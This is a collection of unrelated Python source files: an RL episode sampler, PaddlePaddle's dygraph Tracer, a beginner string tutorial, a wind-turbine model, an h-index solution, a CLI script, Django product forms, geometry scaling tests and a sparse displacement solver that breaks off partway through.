num_residual_steps = max_steps - num_steps_per_worker * num_workers
queue = mp.Manager().Queue()
workers = []
for i in range(num_workers):
worker_steps = num_steps_per_worker + num_residual_steps if i == 0 else num_steps_per_worker
worker_kwargs = dict(
epoch=epoch,
max_steps=worker_steps,
objects=objects,
pid=i+1,
queue=queue)
workers.append(mp.Process(target=collect_train_samples_serial, kwargs=worker_kwargs))
for j, worker in enumerate(workers):
worker.start()
start = time.time()
master_stats_collector = objects['stats_collector_builder']()
for j, worker in enumerate(workers):
worker_pid, worker_stats_data = queue.get()
master_stats_collector.extend(worker_stats_data)
end = time.time()
objects['printer']('Time to extend master_stats_collector: {}'.format(end-start))
for j, worker in enumerate(workers):
worker.join()
assert master_stats_collector.get_total_steps() == max_steps
return master_stats_collector
def step_agent(env, organism, state, step_info_builder, transform_params):
render = transform_params.render
if render: frame = renderfn(env=env, scale=1)
processed_state = preprocess_state_before_forward(state)
organism_output = organism.forward(processed_state, deterministic=transform_params.deterministic)
transform_params = transform_params if organism_output.action.is_subpolicy else None
transform_output = organism_output.action.transform(
state=state,
env=env,
transform_params=transform_params)
step_info = step_info_builder(
state=state,
organism_output=organism_output,
next_state=transform_output.next_state,
info=transform_output.transform_node
)
if render:
step_info.frame = frame
step_info.mask = 0 if transform_output.done else 1
step_output = StepOutput(
done=transform_output.done,
step_info=step_info,
option_length=transform_output.transform_node.get_length())
return transform_output.next_state, step_output
class Sampler():
def __init__(self, organism, step_info, deterministic):
self.organism = organism
self.deterministic = deterministic
self.step_info_builder = step_info
def begin_episode(self, env):
state = env.reset()
return state
def finish_episode(self, state, episode_data, env):
# 1. flatten reward
reward_chain = flatten_rewards(episode_data)
# 2. identify the index of the start and end of its chain
interval_tree = build_interval_tree(episode_data)
# 3. Set the index of the agents for t and t+1
set_transformation_ids(interval_tree)
# 4. get subreturns matrix
subreturns_matrix = get_subreturns_matrix(reward_chain, self.organism.args.gamma)
if self.organism.args.hrl_verbose:
visualize_hrl_finish_episode(episode_data, interval_tree, reward_chain, subreturns_matrix)
# 5. re-distribute rewards
redistribute_rewards_recursive(episode_data, subreturns_matrix)
return episode_data
def trim_step_infos(self, episode_data):
for step in episode_data:
if not step.hierarchy_info.leaf:
setattr(step.hierarchy_info, 'organism', step.hierarchy_info.organism.id_num)
self.trim_step_infos(step.hierarchy_info.path_data)
return episode_data
def get_bids_for_episode(self, episode_data):
episode_bids = defaultdict(lambda: [])
for step in episode_data:
probs = step['action_dist']
for index, prob in enumerate(probs):
episode_bids[index].append(prob)
return episode_bids
def step_through_episode(self, state, env, max_steps_this_episode, render):
episode_data = []
global_clock = 0
while global_clock < max_steps_this_episode:
max_steps_this_option = max_steps_this_episode - global_clock
state, step_output = step_agent(
env=env,
organism=self.organism,
state=state,
step_info_builder=self.step_info_builder,
transform_params=PolicyTransformParams(
max_steps_this_option=max_steps_this_option,
deterministic=self.deterministic,
render=render)
)
episode_data.append(step_output.step_info)
if step_output.done:
break
global_clock += step_output.option_length
step_output.step_info.next_frame = renderfn(env=env, scale=1) # render last frame
if not step_output.done:
assert global_clock == max_steps_this_episode
return state, episode_data
def sample_episode(self, env, max_steps_this_episode, render=False):
state = self.begin_episode(env)
state, episode_data = self.step_through_episode(
state, env, max_steps_this_episode, render)
episode_data = self.finish_episode(state, episode_data, env)
episode_data = self.trim_step_infos(episode_data)
if self.organism.args.hrl_verbose:
visualize_episode_data(episode_data)
return episode_data
|
python
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import six
from collections import defaultdict
from paddle.fluid import core
from paddle.fluid import framework
from paddle import _C_ops
final_state_name_mapping = {
"matmul_v2": {
"final_op_name": "final_state_matmul",
"transpose_x": "trans_x",
"transpose_y": "trans_y",
"x": "X",
"y": "Y",
"out": "Out",
},
# "elementwise_add": {
# "final_op_name": "final_state_add",
# "x": "X",
# "y": "Y",
# },
"trunc": {
"final_op_name": "final_state_trunc",
"x": "X",
"out": "Out",
},
"pool2d": {
"final_op_name": "final_state_pool2d",
"x": "X",
"kernel_size": "ksize",
"out": "Out",
},
"abs": {
"final_op_name": "final_state_abs",
"x": "X",
"out": "Out",
},
"digamma": {
"final_op_name": "final_state_digamma",
"x": "X",
"out": "Out",
},
"diagonal": {
"final_op_name": "final_state_diagonal",
"x": "Input",
"offset": "offset",
"axis1": "axis1",
"axis2": "axis2",
"out": "Out",
},
"one_hot": {
"final_op_name": "final_state_one_hot",
"x": "X",
"num_class": "depth",
"out": "Out",
}
}
class Tracer(core.Tracer):
"""
:api_attr: imperative
Tracer is used to execute and record the operators executed, to construct the
computation graph in dygraph model. Tracer has two mode, :code:`train_mode`
and :code:`eval_mode`. In :code:`train_mode`, Tracer would add backward network
automatically and perform AutoGrad by method :code:`loss.backward()`.
In :code:`eval_mode`, Tracer would not add backward network.
This is a low level API, users don't need to use it directly.
"""
def __init__(self):
super(Tracer, self).__init__()
self._train_mode = True
def eager_trace_op(self,
type,
inputs,
outputs,
attrs,
stop_gradient=False,
inplace_map=None):
function_ptr = _C_ops.__dict__[type]
core_ops_args_info = _C_ops.get_core_ops_args_info()
core_ops_args_type_info = _C_ops.get_core_ops_args_type_info()
core_ops_returns_info = _C_ops.get_core_ops_returns_info()
op_args = core_ops_args_info[type]
op_args_type = core_ops_args_type_info[type]
op_returns = core_ops_returns_info[type]
arg_list = []
for i in range(len(op_args)):
arg_name = op_args[i]
arg_type = op_args_type[i]
if arg_name in inputs.keys():
arg_to_append = inputs[arg_name]
elif arg_name in outputs.keys():
arg_to_append = outputs[arg_name]
else:
if "Num" in arg_name:
# Remove "Num" suffix to get out_name
out_name = arg_name[:-3]
assert out_name in outputs.keys()
num_outs = len(outputs[out_name])
arg_to_append = num_outs
else:
arg_to_append = None
if arg_to_append is None:
arg_list.append(arg_to_append)
elif arg_type == "tensor":
if isinstance(arg_to_append, list):
arg_list.append(arg_to_append[0])
else:
arg_list.append(arg_to_append)
elif arg_type == "list":
assert isinstance(arg_to_append, list)
arg_list.append(arg_to_append)
else:
assert arg_type == "int"
assert isinstance(arg_to_append, int)
arg_list.append(arg_to_append)
attrs_list = []
for k, v in attrs.items():
attrs_list.append(k)
attrs_list.append(v)
returns = function_ptr(*arg_list, *attrs_list)
if isinstance(returns, tuple):
for i in range(len(op_returns)):
retname = op_returns[i]
if retname in outputs.keys():
# Replaced outputs by function returns
if isinstance(returns[i], list):
for j in range(len(returns[i])):
outputs[retname][j].reconstruct_from_(returns[i][j],
False)
else:
if isinstance(outputs[retname], list):
outputs[retname][0].reconstruct_from_(returns[i],
False)
else:
outputs[retname].reconstruct_from_(returns[i],
False)
elif isinstance(returns, list):
assert len(outputs.keys()) == 1
key = list(outputs.keys())[0]
for j in range(len(returns)):
outputs[key][j].reconstruct_from_(returns[j], False)
else:
assert len(outputs.keys()) == 1
key = list(outputs.keys())[0]
if isinstance(outputs[key], list):
outputs[key][0].reconstruct_from_(returns, False)
else:
outputs[key].reconstruct_from_(returns, False)
def eager_final_state_trace_op(self,
type,
inputs,
outputs,
attrs,
stop_gradient=False,
inplace_map=None):
assert type in final_state_name_mapping.keys()
final_state_type = final_state_name_mapping[type]["final_op_name"]
function_ptr = _C_ops.__dict__[final_state_type]
core_ops_args_info = _C_ops.get_final_state_core_ops_args_info()
core_ops_args_type_info = _C_ops.get_final_state_core_ops_args_type_info(
)
core_ops_returns_info = _C_ops.get_final_state_core_ops_returns_info()
op_args = core_ops_args_info[final_state_type]
op_args_type = core_ops_args_type_info[final_state_type]
op_returns = core_ops_returns_info[final_state_type]
arg_list = []
for i in range(len(op_args)):
eager_arg_name = op_args[i]
arg_type = op_args_type[i]
assert eager_arg_name in final_state_name_mapping[type].keys()
arg_name = final_state_name_mapping[type][eager_arg_name]
if arg_name in inputs.keys():
arg_to_append = inputs[arg_name]
elif arg_name in outputs.keys():
arg_to_append = outputs[arg_name]
elif arg_name in attrs.keys() and arg_type == "":
arg_to_append = attrs[arg_name]
else:
# dispensable
arg_to_append = None
if arg_type == "":
# attribute
arg_list.append(arg_to_append)
elif arg_type == "tensor":
if isinstance(arg_to_append, list):
arg_list.append(arg_to_append[0])
else:
arg_list.append(arg_to_append)
elif arg_type == "list":
assert isinstance(arg_to_append, list)
arg_list.append(arg_to_append)
else:
assert arg_to_append is None
arg_list.append(arg_to_append)
returns = function_ptr(*arg_list)
if isinstance(returns, tuple):
for i in range(len(op_returns)):
eager_retname = op_returns[i]
assert eager_retname in final_state_name_mapping[type].keys()
retname = final_state_name_mapping[type][eager_retname]
if retname in outputs.keys():
# Replaced outputs by function returns
if isinstance(returns[i], list):
for j in range(len(returns[i])):
outputs[retname][j].reconstruct_from_(returns[i][j],
False)
else:
outputs[retname][0].reconstruct_from_(returns[i], False)
elif isinstance(returns, list):
assert len(outputs.keys()) == 1
key = list(outputs.keys())[0]
for j in range(len(returns)):
outputs[key][j].reconstruct_from_(returns[j], False)
else:
assert len(outputs.keys()) == 1
key = list(outputs.keys())[0]
if isinstance(outputs[key], list):
outputs[key][0].reconstruct_from_(returns, False)
else:
outputs[key].reconstruct_from_(returns, False)
def trace_op(self,
type,
inputs,
outputs,
attrs,
stop_gradient=False,
inplace_map=None):
if not framework._in_legacy_dygraph():
# inputs : {"sum": [tensor], ...}
# outputs : {"sum": [tensor], ...}
if type in final_state_name_mapping.keys():
final_state_type = final_state_name_mapping[type][
"final_op_name"]
assert final_state_type in _C_ops.__dict__
self.eager_final_state_trace_op(type, inputs, outputs, attrs,
stop_gradient, inplace_map)
else:
self.eager_trace_op(type, inputs, outputs, attrs, stop_gradient,
inplace_map)
else:
self.trace(type, inputs, outputs, attrs,
framework._current_expected_place(), self._has_grad and
not stop_gradient, inplace_map if inplace_map else {})
def train_mode(self):
self._train_mode = True
def eval_mode(self):
self._train_mode = False
|
python
|
#-*- coding:utf-8 -*-
# 2.2 变量
message = "Hello Python world!"
print(message)
message = "现在的时间是:2021年6月11日21:07:18"
print(message)
# 2.3 字符串
name = "ada love lace"
print(name.title())
print(name.upper())
print(name.lower())
first_name = "ada"
last_name = "love lace"
full_name = first_name + last_name
print(full_name)
print("Python:\nC:\nObject\n")
print(len(' python '))
print(len(' python '.rstrip()))
print(len(' python '.lstrip()))
print(len(' python '.strip()))
my_name = "my name's liuhanyu"
the_name = 'my "name" is liuhanyu'
# 2.4 数字
print(2 + 3)
print(2 - 3)
print(2 * 3)
print(2 / 3)
print(2 % 3)
# 乘方
print(2 ** 3)
# 次序
print(2 + 3 ** 2 / 2 -1)
print(0.1 + 0.2) # 小数位数不确定,不用担心
age = 23
print("Happy " + str(age) + 'rd Birthday!')
print(3 / 2)
print(3 / 2.0)
|
python
|
from .model_108_basicDdSt import BasicDdSt
|
python
|
import numpy as np
from py_wake.site._site import UniformWeibullSite
from py_wake.wind_turbines import OneTypeWindTurbines
wt_x = [134205, 134509, 134813, 135118, 135423]
wt_y = [538122, 538095, 538067, 538037, 538012]
power_curve = np.array([[3.0, 0.0],
[4.0, 15.0],
[5.0, 121.0],
[6.0, 251.0],
[7.0, 433.0],
[8.0, 667.0],
[9.0, 974.0],
[10.0, 1319.0],
[11.0, 1675.0],
[12.0, 2004.0],
[13.0, 2281.0],
[14.0, 2463.0],
[15.0, 2500.0],
[16.0, 2500.0],
[17.0, 2500.0],
[18.0, 2500.0],
[19.0, 2500.0],
[20.0, 2500.0],
[21.0, 2500.0],
[22.0, 2500.0],
[23.0, 2500.0],
[24.0, 2500.0],
[25.0, 2500.0]])
# Calculated ct curve using PHATAS (BEM code from ECN)
ct_curve = np.array([[3.0, 0.0],
[4.0, 0.85199],
[5.0, 0.85199],
[6.0, 0.80717],
[7.0, 0.78455],
[8.0, 0.76444],
[9.0, 0.72347],
[10.0, 0.66721],
[11.0, 0.62187],
[12.0, 0.57274],
[13.0, 0.50807],
[14.0, 0.42737],
[15.0, 0.33182],
[16.0, 0.26268],
[17.0, 0.21476],
[18.0, 0.18003],
[19.0, 0.15264],
[20.0, 0.13089],
[21.0, 0.11374],
[22.0, 0.09945],
[23.0, 0.08766],
[24.0, 0.07796],
[25.0, 0.06971]])
class N80(OneTypeWindTurbines):
def __init__(self):
OneTypeWindTurbines.__init__(self, 'N80', diameter=80.0, hub_height=80.0,
ct_func=self._ct, power_func=self._power, power_unit='kW')
def _ct(self, u):
return np.interp(u, ct_curve[:, 0], ct_curve[:, 1])
def _power(self, u):
return np.interp(u, power_curve[:, 0], power_curve[:, 1])
def main():
if __name__ == '__main__':
wt = N80()
print('Diameter', wt.diameter())
print('Hub height', wt.hub_height())
ws = np.arange(3, 25)
import matplotlib.pyplot as plt
plt.plot(ws, wt.power(ws), '.-')
plt.show()
main()
|
python
|
import unittest
class Solution:
def hIndex(self, citations):
"""
:type citations: List[int]
:rtype: int
"""
if not citations:
return 0
citations.sort(reverse=True)
h = 0
for i in citations:
if i > h:
h += 1
else:
break
return h
class Test(unittest.TestCase):
def test(self):
self._test([3, 0, 6, 1, 5], 3)
self._test([2, 1], 1)
def _test(self, citations, expected):
actual = Solution().hIndex(citations)
self.assertEqual(expected, actual)
if __name__ == '__main__':
unittest.main()
|
python
|
# -*- coding: utf-8 -*-
"""Console script for rps."""
import click
from .log import get_log
import asyncio
from .server import Site
from .api import start
def validate_url(ctx, param, value):
try:
return value
except ValueError:
raise click.BadParameter('url need to be format: tcp://ipv4:port')
@click.command()
@click.option('--unit_id', default=1,
envvar='UNIT_ID',
help='the NM’s Unit ID, ENV: UNIT_ID, default: 1')
@click.option('--device_type', default='plc_430',
envvar='DEVICE_TYPE',
help='NM_DeviceType, also ENV: DEVICE_TYPE')
@click.option('--port', default=80,
envvar='SVC_PORT',
help='Api port, default=80, ENV: SVC_PORT')
@click.option('--debug', is_flag=True)
def main(unit_id, device_type, port, debug):
click.echo("See more documentation at http://www.mingvale.com")
info = {
'unit_id': unit_id,
'device_type': device_type,
'api_port': port,
}
log = get_log(debug)
log.info('Basic Information: {}'.format(info))
loop = asyncio.get_event_loop()
loop.set_debug(0)
try:
site = Site(unit_id, device_type, loop)
site.start()
api_task = loop.create_task(start(port, site))
loop.run_forever()
except OSError as e:
log.error(e)
except KeyboardInterrupt:
if api_task:
api_task.cancel()
loop.run_until_complete(api_task)
finally:
loop.stop()
loop.close()
|
python
|
from .controllers.product import ProductController
from .models import commerce
from .models import inventory
from django import forms
from django.db.models import Q
class ApplyCreditNoteForm(forms.Form):
required_css_class = 'label-required'
def __init__(self, user, *a, **k):
''' User: The user whose invoices should be made available as
choices. '''
self.user = user
super(ApplyCreditNoteForm, self).__init__(*a, **k)
self.fields["invoice"].choices = self._unpaid_invoices
def _unpaid_invoices(self):
invoices = commerce.Invoice.objects.filter(
status=commerce.Invoice.STATUS_UNPAID,
).select_related("user")
invoices_annotated = [invoice.__dict__ for invoice in invoices]
users = dict((inv.user.id, inv.user) for inv in invoices)
for invoice in invoices_annotated:
invoice.update({
"user_id": users[invoice["user_id"]].id,
"user_email": users[invoice["user_id"]].email,
})
key = lambda inv: (0 - (inv["user_id"] == self.user.id), inv["id"]) # noqa
invoices_annotated.sort(key=key)
template = (
'Invoice %(id)d - user: %(user_email)s (%(user_id)d) '
'- $%(value)d'
)
return [
(invoice["id"], template % invoice)
for invoice in invoices_annotated
]
invoice = forms.ChoiceField(
required=True,
)
verify = forms.BooleanField(
required=True,
help_text="Have you verified that this is the correct invoice?",
)
class CancellationFeeForm(forms.Form):
required_css_class = 'label-required'
percentage = forms.DecimalField(
required=True,
min_value=0,
max_value=100,
)
class ManualCreditNoteRefundForm(forms.ModelForm):
required_css_class = 'label-required'
class Meta:
model = commerce.ManualCreditNoteRefund
fields = ["reference"]
class ManualPaymentForm(forms.ModelForm):
required_css_class = 'label-required'
class Meta:
model = commerce.ManualPayment
fields = ["reference", "amount"]
# Products forms -- none of these have any fields: they are to be subclassed
# and the fields added as needs be. ProductsForm (the function) is responsible
# for the subclassing.
def ProductsForm(category, products):
''' Produces an appropriate _ProductsForm subclass for the given render
type. '''
# Each Category.RENDER_TYPE value has a subclass here.
cat = inventory.Category
RENDER_TYPES = {
cat.RENDER_TYPE_QUANTITY: _QuantityBoxProductsForm,
cat.RENDER_TYPE_RADIO: _RadioButtonProductsForm,
cat.RENDER_TYPE_ITEM_QUANTITY: _ItemQuantityProductsForm,
cat.RENDER_TYPE_CHECKBOX: _CheckboxProductsForm,
}
# Produce a subclass of _ProductsForm which we can alter the base_fields on
class ProductsForm(RENDER_TYPES[category.render_type]):
pass
products = list(products)
products.sort(key=lambda prod: prod.order)
ProductsForm.set_fields(category, products)
if category.render_type == inventory.Category.RENDER_TYPE_ITEM_QUANTITY:
ProductsForm = forms.formset_factory(
ProductsForm,
formset=_ItemQuantityProductsFormSet,
)
return ProductsForm
class _HasProductsFields(object):
PRODUCT_PREFIX = "product_"
''' Base class for product entry forms. '''
def __init__(self, *a, **k):
if "product_quantities" in k:
initial = self.initial_data(k["product_quantities"])
k["initial"] = initial
del k["product_quantities"]
super(_HasProductsFields, self).__init__(*a, **k)
@classmethod
def field_name(cls, product):
return cls.PRODUCT_PREFIX + ("%d" % product.id)
@classmethod
def set_fields(cls, category, products):
''' Sets the base_fields on this _ProductsForm to allow selecting
from the provided products. '''
pass
@classmethod
def initial_data(cls, product_quantites):
''' Prepares initial data for an instance of this form.
product_quantities is a sequence of (product,quantity) tuples '''
return {}
def product_quantities(self):
''' Yields a sequence of (product, quantity) tuples from the
cleaned form data. '''
return iter([])
def add_product_error(self, product, error):
''' Adds an error to the given product's field '''
''' if product in field_names:
field = field_names[product]
elif isinstance(product, inventory.Product):
return
else:
field = None '''
self.add_error(self.field_name(product), error)
class _ProductsForm(_HasProductsFields, forms.Form):
required_css_class = 'label-required'
pass
class _QuantityBoxProductsForm(_ProductsForm):
''' Products entry form that allows users to enter quantities
of desired products. '''
@classmethod
def set_fields(cls, category, products):
for product in products:
if product.description:
help_text = "$%d each -- %s" % (
product.price,
product.description,
)
else:
help_text = "$%d each" % product.price
field = forms.IntegerField(
label=product.name,
help_text=help_text,
min_value=0,
max_value=500, # Issue #19. We should figure out real limit.
)
cls.base_fields[cls.field_name(product)] = field
@classmethod
def initial_data(cls, product_quantities):
initial = {}
for product, quantity in product_quantities:
initial[cls.field_name(product)] = quantity
return initial
def product_quantities(self):
for name, value in self.cleaned_data.items():
if name.startswith(self.PRODUCT_PREFIX):
product_id = int(name[len(self.PRODUCT_PREFIX):])
yield (product_id, value)
class _RadioButtonProductsForm(_ProductsForm):
''' Products entry form that allows users to enter quantities
of desired products. '''
FIELD = "chosen_product"
@classmethod
def set_fields(cls, category, products):
choices = []
for product in products:
choice_text = "%s -- $%d" % (product.name, product.price)
choices.append((product.id, choice_text))
if not category.required:
choices.append((0, "No selection"))
cls.base_fields[cls.FIELD] = forms.TypedChoiceField(
label=category.name,
widget=forms.RadioSelect,
choices=choices,
empty_value=0,
coerce=int,
)
@classmethod
def initial_data(cls, product_quantities):
initial = {}
for product, quantity in product_quantities:
if quantity > 0:
initial[cls.FIELD] = product.id
break
return initial
def product_quantities(self):
ours = self.cleaned_data[self.FIELD]
choices = self.fields[self.FIELD].choices
for choice_value, choice_display in choices:
if choice_value == 0:
continue
yield (
choice_value,
1 if ours == choice_value else 0,
)
def add_product_error(self, product, error):
self.add_error(self.FIELD, error)
class _CheckboxProductsForm(_ProductsForm):
''' Products entry form that allows users to say yes or no
to desired products. Basically, it's a quantity form, but the quantity
is either zero or one.'''
@classmethod
def set_fields(cls, category, products):
for product in products:
field = forms.BooleanField(
label='%s -- %s' % (product.name, product.price),
required=False,
)
cls.base_fields[cls.field_name(product)] = field
@classmethod
def initial_data(cls, product_quantities):
initial = {}
for product, quantity in product_quantities:
initial[cls.field_name(product)] = bool(quantity)
return initial
def product_quantities(self):
for name, value in self.cleaned_data.items():
if name.startswith(self.PRODUCT_PREFIX):
product_id = int(name[len(self.PRODUCT_PREFIX):])
yield (product_id, int(value))
class _ItemQuantityProductsForm(_ProductsForm):
''' Products entry form that allows users to select a product type, and
enter a quantity of that product. This version _only_ allows a single
product type to be purchased. This form is usually used in concert with
the _ItemQuantityProductsFormSet to allow selection of multiple
products.'''
CHOICE_FIELD = "choice"
QUANTITY_FIELD = "quantity"
@classmethod
def set_fields(cls, category, products):
choices = []
if not category.required:
choices.append((0, "---"))
for product in products:
choice_text = "%s -- $%d each" % (product.name, product.price)
choices.append((product.id, choice_text))
cls.base_fields[cls.CHOICE_FIELD] = forms.TypedChoiceField(
label=category.name,
widget=forms.Select,
choices=choices,
initial=0,
empty_value=0,
coerce=int,
)
cls.base_fields[cls.QUANTITY_FIELD] = forms.IntegerField(
label="Quantity", # TODO: internationalise
min_value=0,
max_value=500, # Issue #19. We should figure out real limit.
)
@classmethod
def initial_data(cls, product_quantities):
initial = {}
for product, quantity in product_quantities:
if quantity > 0:
initial[cls.CHOICE_FIELD] = product.id
initial[cls.QUANTITY_FIELD] = quantity
break
return initial
def product_quantities(self):
our_choice = self.cleaned_data[self.CHOICE_FIELD]
our_quantity = self.cleaned_data[self.QUANTITY_FIELD]
choices = self.fields[self.CHOICE_FIELD].choices
for choice_value, choice_display in choices:
if choice_value == 0:
continue
yield (
choice_value,
our_quantity if our_choice == choice_value else 0,
)
def add_product_error(self, product, error):
if self.CHOICE_FIELD not in self.cleaned_data:
return
if product.id == self.cleaned_data[self.CHOICE_FIELD]:
self.add_error(self.CHOICE_FIELD, error)
self.add_error(self.QUANTITY_FIELD, error)
class _ItemQuantityProductsFormSet(_HasProductsFields, forms.BaseFormSet):
required_css_class = 'label-required'
@classmethod
def set_fields(cls, category, products):
raise ValueError("set_fields must be called on the underlying Form")
@classmethod
def initial_data(cls, product_quantities):
''' Prepares initial data for an instance of this form.
product_quantities is a sequence of (product,quantity) tuples '''
f = [
{
_ItemQuantityProductsForm.CHOICE_FIELD: product.id,
_ItemQuantityProductsForm.QUANTITY_FIELD: quantity,
}
for product, quantity in product_quantities
if quantity > 0
]
return f
def product_quantities(self):
''' Yields a sequence of (product, quantity) tuples from the
cleaned form data. '''
products = set()
# Track everything so that we can yield some zeroes
all_products = set()
for form in self:
if form.empty_permitted and not form.cleaned_data:
# This is the magical empty form at the end of the list.
continue
for product, quantity in form.product_quantities():
all_products.add(product)
if quantity == 0:
continue
if product in products:
form.add_error(
_ItemQuantityProductsForm.CHOICE_FIELD,
"You may only choose each product type once.",
)
form.add_error(
_ItemQuantityProductsForm.QUANTITY_FIELD,
"You may only choose each product type once.",
)
products.add(product)
yield product, quantity
for product in (all_products - products):
yield product, 0
def add_product_error(self, product, error):
for form in self.forms:
form.add_product_error(product, error)
@property
def errors(self):
_errors = super(_ItemQuantityProductsFormSet, self).errors
if False not in [not form.errors for form in self.forms]:
return []
else:
return _errors
class VoucherForm(forms.Form):
required_css_class = 'label-required'
voucher = forms.CharField(
label="Voucher code",
help_text="If you have a voucher code, enter it here",
required=False,
)
def staff_products_form_factory(user):
''' Creates a StaffProductsForm that restricts the available products to
those that are available to a user. '''
products = inventory.Product.objects.all()
products = ProductController.available_products(user, products=products)
product_ids = [product.id for product in products]
product_set = inventory.Product.objects.filter(id__in=product_ids)
class StaffProductsForm(forms.Form):
''' Form for allowing staff to add an item to a user's cart. '''
product = forms.ModelChoiceField(
widget=forms.Select,
queryset=product_set,
)
quantity = forms.IntegerField(
min_value=0,
)
return StaffProductsForm
def staff_products_formset_factory(user):
''' Creates a formset of StaffProductsForm for the given user. '''
form_type = staff_products_form_factory(user)
return forms.formset_factory(form_type)
class InvoicesWithProductAndStatusForm(forms.Form):
required_css_class = 'label-required'
invoice = forms.ModelMultipleChoiceField(
widget=forms.CheckboxSelectMultiple,
queryset=commerce.Invoice.objects.all(),
)
def __init__(self, *a, **k):
category = k.pop('category', None) or []
product = k.pop('product', None) or []
status = int(k.pop('status', None) or 0)
category = [int(i) for i in category]
product = [int(i) for i in product]
super(InvoicesWithProductAndStatusForm, self).__init__(*a, **k)
qs = commerce.Invoice.objects.filter(
status=status or commerce.Invoice.STATUS_UNPAID,
).filter(
Q(lineitem__product__category__in=category) |
Q(lineitem__product__in=product)
)
# Uniqify
qs = commerce.Invoice.objects.filter(
id__in=qs,
)
qs = qs.select_related("user__attendee__attendeeprofilebase")
qs = qs.order_by("id")
self.fields['invoice'].queryset = qs
# self.fields['invoice'].initial = [i.id for i in qs] # UNDO THIS LATER
class InvoiceEmailForm(InvoicesWithProductAndStatusForm):
ACTION_PREVIEW = 1
ACTION_SEND = 2
ACTION_CHOICES = (
(ACTION_PREVIEW, "Preview"),
(ACTION_SEND, "Send emails"),
)
from_email = forms.CharField()
subject = forms.CharField()
body = forms.CharField(
widget=forms.Textarea,
)
action = forms.TypedChoiceField(
widget=forms.RadioSelect,
coerce=int,
choices=ACTION_CHOICES,
initial=ACTION_PREVIEW,
)
|
python
|
from typing import Tuple
from hypothesis import given
from gon.base import (Compound,
Geometry)
from gon.hints import Scalar
from tests.utils import (equivalence,
robust_invert)
from . import strategies
@given(strategies.geometries_with_coordinates_pairs)
def test_basic(geometry_with_factors: Tuple[Geometry, Scalar, Scalar]
) -> None:
geometry, factor_x, factor_y = geometry_with_factors
result = geometry.scale(factor_x, factor_y)
assert isinstance(result, Geometry)
assert equivalence(isinstance(result, Compound),
isinstance(geometry, Compound))
@given(strategies.geometries_with_non_zero_coordinates_pairs)
def test_round_trip(geometry_with_non_zero_factors
: Tuple[Geometry, Scalar, Scalar]) -> None:
geometry, factor_x, factor_y = geometry_with_non_zero_factors
result = geometry.scale(factor_x, factor_y)
assert (result.scale(robust_invert(factor_x), robust_invert(factor_y))
== geometry)
@given(strategies.geometries)
def test_neutral_factor(geometry: Geometry) -> None:
result = geometry.scale(1)
assert result == geometry
@given(strategies.empty_compounds_with_coordinates_pairs)
def test_empty(geometry_with_factors: Tuple[Geometry, Scalar, Scalar]) -> None:
geometry, factor_x, factor_y = geometry_with_factors
result = geometry.scale(factor_x, factor_y)
assert result == geometry
|
python
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from math import fabs
import compas
import numpy as np
import scipy as sp
import scipy.linalg
import scipy.sparse
import scipy.sparse.linalg
def compute_displacement_x(mesh, gate_points, x_size, z_size, coeff_diffusion=1):
"""calculate an x displacement for every non-gate non-boundary point,
given the pre-assigned displacements of the gate points. The left and
right edges of the wall are treated as fixed boundaries (Dirichlet) and
top and bottom as zero-gradient (Neumann)
"""
n = z_size
m = x_size
nm= n*m
rhs = np.zeros(nm) #equation right hand side
dia1 = np.ones(nm)*-4 #main diagonal of K matrix
dia2 = np.ones(nm-1) #second diagonal (up) corresponding to right neighbors
dia2[np.arange(0,nm-1,n)]+=1 #Neumann BC using ghost-points
dia2[np.arange(n-1,nm-1,n)]-=1 #Neumann BC using ghost-points
dia3 = np.ones(nm-1) #diagonal corresponding to left neighbors
dia3[np.arange(n-2,nm-1,n)]+=1 #Neumann
dia3[np.arange(n-1,nm-1,n)]-=1 #Neumann
dia4 = np.ones(nm-n) #diagonal corresponding to up neghbors
dia5 = np.ones(nm-n) #diagonal corresponding to bottom neighbors
#sparse coef. (stiffness) matrix built out of 5 diagonals
K = sp.sparse.diags([dia1, dia2, dia3, dia4, dia5], [0, 1, -1, n, -n], format='csc')
#BCdofs is the vector of degrees of freedom with dirichlet (displacement) boundary condition
#at first left and right sides are added to BCdofs
BCdofs=np.concatenate((np.arange(0,n),np.arange(nm-n,nm)))
#assigning zero displacement to left and right
BCvals=np.zeros(BCdofs.size)
#for applying the dirichlet, for dofs with displacement BC, the rhs is set to the according dispalcement
rhs[BCdofs]=BCvals
#loop over gate points as additional displacement BCs (non-zero, in contrast to left & right edges)
for vertex in (gate_points):
glob_id = mesh.vertex_attribute(vertex, "glob_id")
x_disp = mesh.vertex_attribute(vertex, "x_disp")
rhs[glob_id]=x_disp
BCdofs = np.append(BCdofs,glob_id)
#constructing an identitiy matrix (named Iinter) of size (nm x nm) with zero value on diagonals
# of displacement BC dofs. If applied on (multiplied by) K, only non-BC (internal) dofs will remain
diaInter=np.ones(nm)
diaInter[BCdofs]=0.0
Iinter = sp.sparse.diags([diaInter], [0], format='csc')
#constructing an identitiy matrix (named Ibc) of size (nm x nm) with zero value on diagonals
# of internal (non-BC) dofs. If applied on (multiplied by) K, only BC (internal) dofs will remain
diaBC=np.zeros(nm)
diaBC[BCdofs]=1.0
Ibc = sp.sparse.diags([diaBC], [0], format='csc')
#applying dirichlet on K, by zeroing out rows and columns of BC dofs and setting BC-diagonals to 1
K_BC= Iinter * K * Iinter + Ibc
#modifying the rhs for non-BC dofs to account for the eliminated dofs
# the operation below assignes -K_internal*x_BC to rhs_internal (and doesn't change rhs_BC)
rhs = rhs - Iinter * (K-(Ibc * K ))* rhs
#solving the system
sol = scipy.sparse.linalg.spsolve(K_BC,rhs)
return sol
def compute_displacement_z(mesh, gate_points, x_size, z_size, coeff_diffusion=1):
"""calculate an x displacement for every non-gate non-boundary point,
given the pre-assigned displacements of the gate points. The left and
right edges of the wall are treated as fixed boundaries (Dirichlet) and
top and bottom as zero-gradient (Neumann)
"""
n = z_size
m = x_size
nm= n*m
rhs = np.zeros(nm) #equation right hand side
dia1 = np.ones(nm)*-4 #main diagonal of K matrix
dia2 = np.ones(nm-1) #second diagonal (up) corresponding to right neighbors
dia3 = np.ones(nm-1) #diagonal corresponding to left neighbors
